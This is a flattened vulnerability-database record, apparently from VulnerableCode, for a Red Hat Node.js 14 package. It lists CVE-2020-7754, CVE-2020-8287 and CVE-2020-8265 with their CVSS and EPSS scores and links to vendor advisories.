reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1019353
6
reference_url https://snyk.io/vuln/SNYK-JS-NPMUSERVALIDATE-1019352
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://snyk.io/vuln/SNYK-JS-NPMUSERVALIDATE-1019352
7
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1892430
reference_id 1892430
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1892430
8
reference_url https://github.com/advisories/GHSA-pw54-mh39-w3hc
reference_id GHSA-pw54-mh39-w3hc
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-pw54-mh39-w3hc
9
reference_url https://access.redhat.com/errata/RHSA-2021:0421
reference_id RHSA-2021:0421
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0421
10
reference_url https://access.redhat.com/errata/RHSA-2021:0485
reference_id RHSA-2021:0485
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0485
11
reference_url https://access.redhat.com/errata/RHSA-2021:0521
reference_id RHSA-2021:0521
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0521
12
reference_url https://access.redhat.com/errata/RHSA-2021:0548
reference_id RHSA-2021:0548
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0548
13
reference_url https://access.redhat.com/errata/RHSA-2021:0549
reference_id RHSA-2021:0549
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0549
14
reference_url https://access.redhat.com/errata/RHSA-2021:0551
reference_id RHSA-2021:0551
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0551
fixed_packages
aliases CVE-2020-7754, GHSA-pw54-mh39-w3hc
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-v5h1-gpt1-97bj
5
url VCID-zj4d-e8r7-ufg3
vulnerability_id VCID-zj4d-e8r7-ufg3
summary
Multiple vulnerabilities have been found in NodeJS, the worst of
    which could result in the arbitrary execution of code.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-8287.json
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-8287.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-8287
reference_id
reference_type
scores
0
value 0.11865
scoring_system epss
scoring_elements 0.93694
published_at 2026-04-01T12:55:00Z
1
value 0.11865
scoring_system epss
scoring_elements 0.9376
published_at 2026-04-21T12:55:00Z
2
value 0.11865
scoring_system epss
scoring_elements 0.9375
published_at 2026-04-16T12:55:00Z
3
value 0.11865
scoring_system epss
scoring_elements 0.93757
published_at 2026-04-18T12:55:00Z
4
value 0.11865
scoring_system epss
scoring_elements 0.93704
published_at 2026-04-02T12:55:00Z
5
value 0.11865
scoring_system epss
scoring_elements 0.93714
published_at 2026-04-04T12:55:00Z
6
value 0.11865
scoring_system epss
scoring_elements 0.93717
published_at 2026-04-07T12:55:00Z
7
value 0.11865
scoring_system epss
scoring_elements 0.93726
published_at 2026-04-08T12:55:00Z
8
value 0.11865
scoring_system epss
scoring_elements 0.93727
published_at 2026-04-09T12:55:00Z
9
value 0.11865
scoring_system epss
scoring_elements 0.93732
published_at 2026-04-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-8287
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8265
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8265
3
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8287
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8287
4
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
5
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1016690
reference_id 1016690
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1016690
6
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1912863
reference_id 1912863
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1912863
7
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=979364
reference_id 979364
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=979364
8
reference_url https://security.archlinux.org/ASA-202101-16
reference_id ASA-202101-16
reference_type
scores
url https://security.archlinux.org/ASA-202101-16
9
reference_url https://security.archlinux.org/AVG-1400
reference_id AVG-1400
reference_type
scores
0
value High
scoring_system archlinux
scoring_elements
url https://security.archlinux.org/AVG-1400
10
reference_url https://access.redhat.com/errata/RHSA-2021:0421
reference_id RHSA-2021:0421
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0421
11
reference_url https://access.redhat.com/errata/RHSA-2021:0485
reference_id RHSA-2021:0485
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0485
12
reference_url https://access.redhat.com/errata/RHSA-2021:0521
reference_id RHSA-2021:0521
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0521
13
reference_url https://access.redhat.com/errata/RHSA-2021:0548
reference_id RHSA-2021:0548
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0548
14
reference_url https://access.redhat.com/errata/RHSA-2021:0549
reference_id RHSA-2021:0549
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0549
15
reference_url https://access.redhat.com/errata/RHSA-2021:0551
reference_id RHSA-2021:0551
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0551
16
reference_url https://usn.ubuntu.com/5563-1/
reference_id USN-5563-1
reference_type
scores
url https://usn.ubuntu.com/5563-1/
17
reference_url https://usn.ubuntu.com/6380-1/
reference_id USN-6380-1
reference_type
scores
url https://usn.ubuntu.com/6380-1/
fixed_packages
aliases CVE-2020-8287
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-zj4d-e8r7-ufg3
6
url VCID-ztt4-vnk7-7ycq
vulnerability_id VCID-ztt4-vnk7-7ycq
summary
Multiple vulnerabilities have been found in NodeJS, the worst of
    which could result in the arbitrary execution of code.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-8265.json
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-8265.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-8265
reference_id
reference_type
scores
0
value 0.00755
scoring_system epss
scoring_elements 0.73197
published_at 2026-04-01T12:55:00Z
1
value 0.00755
scoring_system epss
scoring_elements 0.73292
published_at 2026-04-21T12:55:00Z
2
value 0.00755
scoring_system epss
scoring_elements 0.73291
published_at 2026-04-16T12:55:00Z
3
value 0.00755
scoring_system epss
scoring_elements 0.733
published_at 2026-04-18T12:55:00Z
4
value 0.00755
scoring_system epss
scoring_elements 0.73207
published_at 2026-04-02T12:55:00Z
5
value 0.00755
scoring_system epss
scoring_elements 0.73228
published_at 2026-04-04T12:55:00Z
6
value 0.00755
scoring_system epss
scoring_elements 0.73201
published_at 2026-04-07T12:55:00Z
7
value 0.00755
scoring_system epss
scoring_elements 0.73238
published_at 2026-04-08T12:55:00Z
8
value 0.00755
scoring_system epss
scoring_elements 0.73251
published_at 2026-04-09T12:55:00Z
9
value 0.00755
scoring_system epss
scoring_elements 0.73276
published_at 2026-04-11T12:55:00Z
10
value 0.00755
scoring_system epss
scoring_elements 0.73255
published_at 2026-04-12T12:55:00Z
11
value 0.00755
scoring_system epss
scoring_elements 0.73248
published_at 2026-04-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-8265
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8265
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8265
3
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8287
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8287
4
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
5
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1912854
reference_id 1912854
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1912854
6
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=979364
reference_id 979364
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=979364
7
reference_url https://security.archlinux.org/ASA-202101-16
reference_id ASA-202101-16
reference_type
scores
url https://security.archlinux.org/ASA-202101-16
8
reference_url https://security.archlinux.org/AVG-1400
reference_id AVG-1400
reference_type
scores
0
value High
scoring_system archlinux
scoring_elements
url https://security.archlinux.org/AVG-1400
9
reference_url https://access.redhat.com/errata/RHSA-2021:0421
reference_id RHSA-2021:0421
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0421
10
reference_url https://access.redhat.com/errata/RHSA-2021:0485
reference_id RHSA-2021:0485
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0485
11
reference_url https://access.redhat.com/errata/RHSA-2021:0521
reference_id RHSA-2021:0521
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0521
12
reference_url https://access.redhat.com/errata/RHSA-2021:0548
reference_id RHSA-2021:0548
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0548
13
reference_url https://access.redhat.com/errata/RHSA-2021:0549
reference_id RHSA-2021:0549
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0549
14
reference_url https://access.redhat.com/errata/RHSA-2021:0551
reference_id RHSA-2021:0551
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0551
15
reference_url https://usn.ubuntu.com/6380-1/
reference_id USN-6380-1
reference_type
scores
url https://usn.ubuntu.com/6380-1/
fixed_packages
aliases CVE-2020-8265
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ztt4-vnk7-7ycq
Fixing_vulnerabilities
Risk_score4.0
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:rpm/redhat/rh-nodejs14-nodejs@14.15.4-2%3Farch=el7